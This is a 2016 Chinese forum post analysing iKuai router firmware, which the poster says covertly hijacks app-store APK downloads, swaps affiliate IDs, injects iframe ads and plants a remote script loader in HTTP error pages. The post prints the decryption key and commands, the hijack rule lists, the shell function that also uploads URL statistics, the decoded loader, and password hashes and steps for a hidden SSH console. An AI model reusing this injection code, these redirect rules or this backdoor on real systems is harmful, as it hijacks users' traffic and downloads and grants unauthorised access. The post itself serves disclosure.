爱快x86版本确实存在 APK跳转劫持和百度联盟等劫持

本帖最后由 hacker1990 于 2016-5-21 17:16 编辑

前一段时间论坛两位朋友发的帖子，说爱快有劫持APK的行为，我看他们的证据不充足以为是其它原因，今天通过进一步深入研究，终于发现了，确实是爱快官方的行为，爱快官方有一个广告变现的业余，但这个APK和百度、hao123的劫持是独立的，和广告变现业务是没关系的，还贴心的有白名单。

http://forum.anywlan.com/thread-393450-1-1.html

http://forum.anywlan.com/thread-393436-1-1.html

白名单uid

5051f802bd93ca716eb15609412aac5f
53f28ade30f506575d0c816f620bf839
c9191add4f7287010260795d810853a4
9a1f38e99b7831b94a8598212ad25e82
f043273f6c4ee661944e6ecc2dd6eff6

APK劫持库地址
https://download.ikuai8.com/submit/app

保存位置 /tmp/.app.test
这个app使用了des3加密，

更新一下放出解密方法：

下载 https://download.ikuai8.com/submit/app

wget --no-check-certificate https://download.ikuai8.com/submit/app

复制代码

解密得到压缩包 app.tgz

openssl des3 -d -k 'fdsafud89safuydosih32l4j32kl8y9fdsaf,.dsaf,.ds1!@#' -in app -out app.tgz

复制代码

解压 app.tgz

tar xzvf app.tgz

复制代码

得到 app.txt.tmp 自己打开看吧，看看和我下面上传的一样不。

解压以后发现第二批uid白名单，估计这些是投诉过的吧。

4078b0a9905c6aaae18185aa2547f56e
c6f24bdfaed2befb390cdbbf3a479ab3
0159c0d4057384f98e838738b627fa71
92cee8e0a821634cccea38fadbf2f7a8
131a98e23bc4ac61a45a6a47d212b0e6
fd98e84a7fa759fc13c3a513927ac89a
太多了。。。省略。。。

APK跳转劫持库

劫持小米、360等主流应用市场、热门游戏、热门应用，不管你是从官方原版市场下载还是别的网站搜索，下载到的都是“李鬼”应用。

700多条
字数限制，贴出部分

100 90 app.market.xiaomi.com/apm/download/1045\\\\? www.kuailewb.com/xiaomi/1045.html
100 90 app.market.xiaomi.com/apm/download/303366\\\\? www.kuailewb.com/xiaomi/303366.html
100 90 app.market.xiaomi.com/apm/download/296916\\\\? www.kuailewb.com/xiaomi/296916.html
100 90 app.market.xiaomi.com/apm/download/1363\\\\? www.kuailewb.com/xiaomi/1363.html
100 90 app.market.xiaomi.com/apm/download/1021\\\\? www.kuailewb.com/xiaomi/1021.html
100 90 app.market.xiaomi.com/apm/download/2469\\\\? www.kuailewb.com/xiaomi/2469.html
100 90 app.market.xiaomi.com/apm/download/1100\\\\? www.kuailewb.com/xiaomi/1100.html
100 90 app.market.xiaomi.com/apm/download/318\\\\? www.kuailewb.com/xiaomi/318.html
100 90 app.market.xiaomi.com/apm/download/297\\\\? www.kuailewb.com/xiaomi/297.html
100 90 app.market.xiaomi.com/apm/download/1357\\\\? www.kuailewb.com/xiaomi/1357.html
100 90 app.market.xiaomi.com/apm/download/88246\\\\? www.kuailewb.com/xiaomi/88246.html
100 90 app.market.xiaomi.com/apm/download/1023\\\\? www.kuailewb.com/xiaomi/1023.html
100 90 app.market.xiaomi.com/apm/download/321\\\\? www.kuailewb.com/xiaomi/321.html
100 90 app.market.xiaomi.com/apm/download/7055\\\\? www.kuailewb.com/xiaomi/7055.html
100 90 app.market.xiaomi.com/apm/download/1104\\\\? www.kuailewb.com/xiaomi/1104.html
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=3570 www.kuailewb.com/360/taobao/getmd5link?from=100130&appid=3570
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=4067 www.kuailewb.com/360/yy/getmd5link?from=100130&appid=4067
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=2058 www.kuailewb.com/360/uc/getmd5link?from=100130&appid=2058
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=2087 www.kuailewb.com/360/tencentVideo/getmd5link?from=100130&appid=2087
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=72187 www.kuailewb.com/360/yingyongbao/getmd5link?from=100130&appid=72187
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=21972 www.kuailewb.com/360/weiph/getmd5link?from=100130&appid=21972
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=5559 www.kuailewb.com/360/baidull/getmd5link?from=100130&appid=5559
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=4674 www.kuailewb.com/360/dazhong/getmd5link?from=100130&appid=4674
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=2720322 www.kuailewb.com/360/mhxy/getmd5link?from=100130&appid=2720322
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=1079 www.kuailewb.com/360/qqll/getmd5link?from=100130&appid=1079
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=60102 www.kuailewb.com/360/baiduzhushou/getmd5link?from=100130&appid=60102
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=5846 www.kuailewb.com/360/baiduss/getmd5link?from=100130&appid=5846
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=7176 www.kuailewb.com/360/baiduws/getmd5link?from=100130&appid=7176
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=48 www.kuailewb.com/360/momo/getmd5link?from=100130&appid=48
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=712409 www.kuailewb.com/360/pp/getmd5link?from=100130&appid=712409
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=43299 www.kuailewb.com/360/tuniu/getmd5link?from=100130&appid=43299
100 90 api.np.mobilem.360.cn/redirect/getmd5link\\\\?from=.*&appid=1053 www.kuailewb.com/360/baofeng/getmd5link?from=100130&appid=1053
100 90 bcs.91.com/pcsuite-dev/apk/594f8fdf0e48d0ef734c276b301a702f\\\\.apk static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 g18.gdl.netease.com/(MY-|g18_netease).*apk static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 downali.game.uc.cn/wm/.*/MY-.*apk static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 w.gdown.baidu.com/data/wisegame/.*/menghuanxiyou.*apk static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 gdown.baidu.com/data/wisegame/.*/menghuanxiyou.*apk static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 cdn.data.video.iqiyi.com/cdn/ppsgame/.*/mhxy.*apk static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 app.p4p.sogou.com/.*/(mhxy_|g18_netease).*apk static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 download[^4].123cw.cn/AppDownload/App/Android/.*/mhxy_.*apk static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 dl.wan.sogoucdn.com/.*/mhxy_.*apk static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 dl.wan.sogoucdn.com/.*/menghuanxiyou static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 api.np.mobilem.360.cn/redirect/down/\\\\?(from=.*appid=2720322$|appid=2720322) static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 xyq.gdl.netease.com/XyqMobile.*apk static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 g18.gdl.netease.com/g18_netease_baidu_mobile_pz_dev_.*apk static.7xz.com/files/soft/corp/singed_dhxy.apk
100 90 api.np.mobilem.360.cn/redirect/down/\\\\?from=gugt_mg_onebox_gs2720322 static.7xz.com/files/soft/corp/singed_dhxy.apk
100 30 down11.zol.com.cn/suyan/weipinhui.*apk down.cozeer.com/com.achievo.vipshop.apk
100 30 cy.cr173.com/weipinhui\\\\.apk down.cozeer.com/com.achievo.vipshop.apk
100 30 3g.lenovomm.com/w3g/yydownload/com.achievo.vipshop down.cozeer.com/com.achievo.vipshop.apk
100 30 g.pconline.com.cn/dl/.*/com.achievo.vipshop.*apk down.cozeer.com/com.achievo.vipshop.apk
100 30 lf.iruan.cn/push/tool/.*/wph/weipinhui\\\\.apk down.cozeer.com/com.achievo.vipshop.apk
100 30 count.liqucn.com/d.php\\\\?id=38943&urlos=android&from_type=wap[ DISCUZ_CODE_46 ]nbsp; down.cozeer.com/com.achievo.vipshop.apk
100 30 m.cnmo.com/app/download.php\\\\?c=Download&appid=132735&system=android[ DISCUZ_CODE_46 ]nbsp; down.cozeer.com/com.achievo.vipshop.apk
100 30 app.vipstatic.com/update/shop_android/.*/shop_android.*apk down.cozeer.com/com.achievo.vipshop.apk
100 30 app.vip.com/update/shop_android/.*/shop_android_.*apk down.cozeer.com/com.achievo.vipshop.apk
100 30 m.baidu.com/baidu.php.*&shh=m.baidu.com&word=%E5%94%AF%E5%93%81%E4%BC%9A down.cozeer.com/com.achievo.vipshop.apk
100 30 w.gdown.baidu.com/data/wisegame/.*/weipinhui.*apk down.cozeer.com/com.achievo.vipshop.apk
100 30 mobile.baidu.com/app\\\\?.*eName=com.achievo.vipshop down.cozeer.com/com.achievo.vipshop.apk
100 30 gdown.baidu.com/data/wisegame/.*/weipinhui.*apk down.cozeer.com/com.achievo.vipshop.apk
100 30 bcs.91.com/pcsuite-dev/apk/601d2d76404a9db965b113877e2144b0\\\\.apk down.cozeer.com/com.achievo.vipshop.apk
100 30 dl.app.sogou.com/appdown/.*/153614629/.*/7144547278 down.cozeer.com/com.achievo.vipshop.apk
100 30 download.zhushou.sogou.com/open/files/.*apk\\\\?dn=%E5%94%AF%E5%93%81%E4%BC%9A.*apk down.cozeer.com/com.achievo.vipshop.apk
100 30 app.p4p.sogou.com/.*/shop_android.*apk down.cozeer.com/com.achievo.vipshop.apk
100 30 djop.down.360tpcdn.com/apk/(df51df905ed833a550b5814338c295e6|f261214ae89378d880634451735f1497)\\\\.apk down.cozeer.com/com.achievo.vipshop.apk
100 30 shouji.360tpcdn.com/.*/com.achievo.vipshop.*apk down.cozeer.com/com.achievo.vipshop.apk
100 90 ftp-apk.pconline.com.cn/.*/pub/download/201010/TencentVideo.*apk down.cozeer.com/com.tencent.qqlive.apk
100 90 g.pconline.com.cn/dl/.*/TencentVideo.*apk down.cozeer.com/com.tencent.qqlive.apk
100 90 file.3gyu.com/soft/.*/tengxunshipin.*apk down.cozeer.com/com.tencent.qqlive.apk
100 90 p.androidgame-store.com/.*/new/.*/txsp.*apk down.cozeer.com/com.tencent.qqlive.apk

复制代码

百度联盟tn，hao123 tn 之类的劫持替换

有的盗版系统或者运营商都劫持搞小尾巴，爱快会来个黑吃黑，全都变成自己的。

TEST_REPLACE='
100 90 wap.sogou.com pid sogou-mobp-7873b66ca1d39eb8
100 90 wap.sogou.com bid sogou-mobp-7873b66ca1d39eb8
100 90 m.sogou.com pid sogou-mobp-7873b66ca1d39eb8
100 90 m.sogou.com bid sogou-mobp-7873b66ca1d39eb8
80 80 www.baidu.com tn 92765401_hao_pg
100 90 m.baidu.com from 1009630a
100 90 m.yz2.sm.cn from wm930654
100 90 m.sp.sm.cn from wm930654
100 90 wap.cmread.com cm M3540031
50 50 hao.360.cn ls n4c740c9e9d
50 50 go.uc.cn source midou2
'
TEST_REPLACE_REFERER='
100 90 m.hao123.com from:1012534d,tn:ops1012534d NULL
40 40 m.hao123.com NULL from=:1012534d,tn=:ops1012534d
40 40 m.sogou.com NULL pid:sogou-mobp-7873b66ca1d39eb8 ,bid:sogou-mobp-7873b66ca1d39eb8
50 50 m.baidu.com NULL from:1009630a
80 80 luna.58.com utm_source:link,spm:m-37944990901783-me-f-801.mjh_5 NULL
50 50 m.haosou.com src:home,srcg:zl_dwyl_15 NULL

复制代码

看爱快论坛这几位反馈的，源头就在劫持库的352行

看到后面那个标识了么 CAESBWZhbmxpGOC8sK-iKg

click.union.vip.com/redirect.php?url=eyJjaGFuIjoiYWsiLCJzY2hlbWVjb2RlIjoiMmY0MXpnaGEiLCJ1Y29kZSI6ImZ3bmh4NWtwIn0=
eyJjaGFuIjoiYWsiLCJzY2hlbWVjb2RlIjoiMmY0MXpnaGEiLCJ1Y29kZSI6ImZ3bmh4NWtwIn0=解密以后 ak

{"chan":"ak","schemecode":"2f41zgha","ucode":"fwnhx5kp"}

一号店的地址website_id=akwx&uid=akwx （爱快无线）

58同城、携程、各种搜索引擎、国美、苏宁、一号店等购物网站、全覆盖。

#奇迹
https://ups.ikuai8.com/qj.txt
/tmp/.qj
HIT='20'
DST_URL='zzqaqjafd.cut120.com:8225'
#棋牌
https://ups.ikuai8.com/qp.txt
/tmp/.qp
HIT='30'
DST_URL='www.game9898.com'
#传奇
https://ups.ikuai8.com/cq.php
/tmp/.cq
HIT='30'
DST_URL='www.yx45.com:4545'
#神途
https://ups.ikuai8.com/st.txt
/tmp/.st
HIT='90'
DST_URL='www.fxwxtx.com'
#魔域
https://ups.ikuai8.com/my.txt
/tmp/.my
HIT='45'
DST_URL='hiti21.taodv.net:18676'
#天龙八部
https://ups.ikuai8.com/tl.txt
/tmp/.tl
HIT='45'
DST_URL='njfs.afdtl.com:10303'

复制代码

<html><body style=overflow:hidden topmargin=0 leftmargin=0 rightmargin=0><iframe frameborder=0 marginheight=0 marginwidth=0 border=0 scrolling=auto height=100% width=100% src="http://${DST_URL}"></iframe></body></html>

复制代码

爱快服务器还专门放置了6大类广告投放网址库，在列表里的网址会插入广告代码，HIT='30' 好像就是30%的命中率，

https://ups.ikuai8.com/qj.txt
https://ups.ikuai8.com/qp.txt
https://ups.ikuai8.com/cq.php
https://ups.ikuai8.com/st.txt
https://ups.ikuai8.com/my.txt
https://ups.ikuai8.com/tl.txt

劫持400 403 404 408 500 502 503错误页面，也是有白名单

http_error() {
#return 0
#errgwid="e4ed9fa3c69e48f0f7728845b8e64495,b2ab1819e9ddfced2a743d6c2b42e828,1e35db376083b26a03b3efc55ea2b7e6,ae32f1ede983306084e579df0fed82f4,c3f74acdc345b9ce02b7a528ad8b4a4c,9d425b5c9ff7348981324d5cbdfba3e9,60678789be3b8a5507c53c7e9a2eb7ea,7dfdf398a072c07fc38847c958904690,f4538201c5e656a1b66083d460e1f92f,bf5f3c7f8b8388dcf45decdf30b509b0,f8c810ecc6625b65d491a585478943be,1d82cc9f3c703609b8943e25bff5df2f,a95b3fefbc11de5e7a25fcd01661681e,ac879a20a1741d8f21c6b7085b203661,cfefd37ae2889b16b02bafbf67b68881,75a144bd0e1c733b4c868a10b7db3588,d0cfcdfd5fa26cf02252adeb315347f9,d2c108026e8ec03fe2fd7395b8f629d1,bee47b4ddaed6f4c1c7117c0399d211c,421080cbd8450843e0005dca24fb834c,4890bb24a241d3366cf06c04501fe45a,9473f6529b08abd51dc387cbd1729e95,a51fecd59b675f76b5e65bd478ee07d5,4201994cb452324770562ac10694c03f,86a2ff88b8ccbbc8b0a69df89234d722,45fac71f80a56a0eae195167fd6326f1,7146a53a830c85b7127b8fa14715e108,8cfffc385885470ff75741b0f9154e38,03d5b4fb6bd5a7bf1467bf00ee944591,8b0826aa1cea527bc540be38677c2b15,7c4297511c5434dae603a47a92d59676,44113e5c1648af47227230b46bdf0592,5cd2e0b5bd6c38a82bbe3e56b2be70fc,1512ac0bb6e12dd2502a6117c4d1c50f,160b98d44bd85189f17ae9f588dbb2d4,8fff7c5c26cab5b3bd6fb91017965168,b84df1b47bdd325e749ea708492cccf3,2b5ed1fe86db741f61b2b23717f34f89,05b076bdcf233589bcf2be082dd49685,acdc1b907b9b26821e19659abf5f6ce1,e6a0732f3a8f73d86c22c90d1d5d4e6e,57fd6e98b49c517f75bd9ce8e1ae0309,f2b27b685e9eaca1aee4639ee08faf1d,7cfec4ad603f47b470f31c4d5811029f,24254c4829bc6db38b89eb34d7db362c,90ef644c0589ad00f638f2be5bcfbdd2,24a9cd2985e432b1ff0d2117bd53e29d,f7f8a3e26a8218717f64fa31e3ec0a2e,7cf1864ec16925a946504227a542da9e,067d2e56cee9b8e3b4f5bc0a4db71382,0fee7ae0f64226ad91523fa2a6f2e333,197002611ebc12cc61e5b3677da99692,9635f076c85afb0d60a64384557aac91,6d7052f37dbb0f6e44379fdf0597575c,278cae74bd834194c3b84ee15cba960e,fc68c7d17127e37b655e29c7bb8d99bf,0dfd110fd138e4095cc34c4f1e024de4,e9f1fc9c9454a05eeeebdd142a32c6a0,74ab28447ca81de456c655b5fcc7ff64,f27b8916f6219ac4d14cce58139e1dec,f9e69ab5385870759bbe2612adf86d99,701286cb87bca232bedebd4b85473330,2cece0eb18a4abecb3eaa0b8e926db85,48c591bb0b2e4fd248d81fbb9360387b,60903efbe302fecea290ad3dfc25b03d,2db71fdfa363117b062f214bf3003f08,5c1c3c9948413ed8a3708fcb6c04068b,8388c60be8bc3672d68723ec2ccfa447,43fabc19b68b1503da2b7e72833d9f20,1a85c3e496fdc1d4c791111f36f29d01,3398e305745a7bc35653c17552d8bc49,6a770886aa7c40aca9ddcb5738bc3fce,0d031f03d279ea043c8fec004b5ed653,437149f38c5cdd0b8de52e6ba5bddb12,2649b91581deeb3af8c91b093215aa3d,3fc7b0c2bec768a46c5dab470b7248d3,600e672ee83d30bff9e6eb2641437e96"
#if [[ "$errgwid" =~ "$uid" ]];then
if [ "$(judge_ver_range ${build_version} 2.5.9~2.5.10)" = "0" ] ;then
err404ver=9
old_err404ver=$(cat /tmp/err404ver 2>/dev/null)
if [ "$err404ver" != "$old_err404ver" ];then
#关闭
ik_cntl http_app errcode off >/dev/null 2>&1
rm -f /tmp/errcode.switch
return 0
if [ ! -e /tmp/errcode.switch ];then
ik_cntl http_app errcode on >/dev/null 2>&1
touch /tmp/errcode.switch
fi
errid=29
errbody="SFRUUC8xLjEgRXJyb3JNc2cgCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04CkNvbm5lY3Rpb246IENsb3NlCgo8aHRtbD4KPGhlYWQ+Cjx0aXRsZT5FcnJvck1zZzwvdGl0bGU+CjwvaGVhZD4KPGJvZHk+CjxjZW50ZXI+PGgxPkVycm9yTXNnPC9oMT48L2NlbnRlcj4KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgppZiAoIHNlbGYgPT0gdG9wICkgewp2YXIgZWxlID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCggInNjcmlwdCIgKTsKZWxlLnNyYyA9ICJodHRwOi8vcy5pa3VhaTguY29tL3NuZi9jLnBocD9nd2lkPWlLdWFpR3dpZCZlcnJvcj1FcnJvckNvZGUiOwpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKCBlbGUgKTsKfQo8L3NjcmlwdD4KPC9ib2R5Pgo8L2h0bWw+Cg=="
for i in 400 403 404 408 500 502 503 ;do
case $i in
400) ErrorMsg="400 Bad Request" ;;
403) ErrorMsg="403 Forbidden" ;;
404) ErrorMsg="404 Not Found" ;;
408) ErrorMsg="408 Request timeout" ;;
500) ErrorMsg="500 Internal Server Error" ;;
502) ErrorMsg="502 Bad Gateway" ;;
503) ErrorMsg="503 Service Unavailable" ;;
esac
errid=$((errid+1))
echo "$errbody"|base64 -d|sed "s/iKuaiGwid/$uid/g;s/ErrorCode/$i/g;s/ErrorMsg/$ErrorMsg/g" >/tmp/.$i.html
ik_cntl http_app_data id $errid on /tmp/.$i.html >/dev/null
rm -f /tmp/.$i.html
ik_cntl http_app err_data $i $errid >/dev/null
done
echo "$err404ver" >/tmp/err404ver
fi
fi
#fi
return 0
if [ "$(judge_ver_range ${build_version} 2.5.9~)" = "0" ] ;then
if [ -e /tmp/errcode.switch ];then
cp /proc/ikuai/stats/ik_url_stats /tmp/ik_url_stats
json_data_http_error=$(awk 'BEGIN{while("cat /tmp/.ik_url_stats.old 2>/dev/null"|getline){gsub(":","");old[$1]=$2};printf "{"} {if(NR>1)printf ",";gsub(":","");printf "\x22%s\x22:%.f",$1,$2-old[$1]} END {printf "}"}' /tmp/ik_url_stats)
mv /tmp/ik_url_stats /tmp/.ik_url_stats.old
wget -t 5 -T 30 --connect-timeout=30 --dns-timeout=20 -q -O /dev/null http://oemyun.ikuai8.com/h.php --post-data="j=$json_data_http_error"
else
ik_cntl http_app errcode on >/dev/null 2>&1
touch /tmp/errcode.switch
fi
fi
}

复制代码

errbody是base64加密的，解密如下

HTTP/1.1 ErrorMsg
Content-Type: text/html; charset=utf-8
Connection: Close
<html>
<head>
<title>ErrorMsg</title>
</head>
<body>
<center><h1>ErrorMsg</h1></center>
<script type="text/javascript">
if ( self == top ) {
var ele = document.createElement( "script" );
ele.src = "http://s.ikuai8.com/snf/c.php?gwid=iKuaiGwid&error=ErrorCode";
document.body.appendChild( ele );
}
</script>
</body>
</html>

复制代码

通过判断版本、设置last_num_hit覆盖路由比率、def_hit规则命中率、oem产品白名单、自定义白名单、多种策略动态控制劫持，

看来免费的产品确实水很深啊，ufwuwlgah 和 snow2sun ，错怪你们了，sorry!

初步分析，欢迎洗地。

##############################################################################

服务器上的文件爱快暂时删除了，已经开机的爱快用户不要重启，切断网络，证据都在/tmp、/tmp/iktmp 目录，
爱快登陆控制台密码MD5加密了，网上有的网站可以解密MD5,

一共两个密码，第一个密码MD5 ：72c5fe66e904745607b30bff453bb75c

第二个密码MD5：08cfb84d23accaaabd050c416d54c487

如果你解密出密码以后在爱快控制台：

输入菜单编号时候输入第一个密码后回车，你会发现界面没有变，接着输入第二个密码回车就会进入SSH状态，自己看吧。

转自中国无线论坛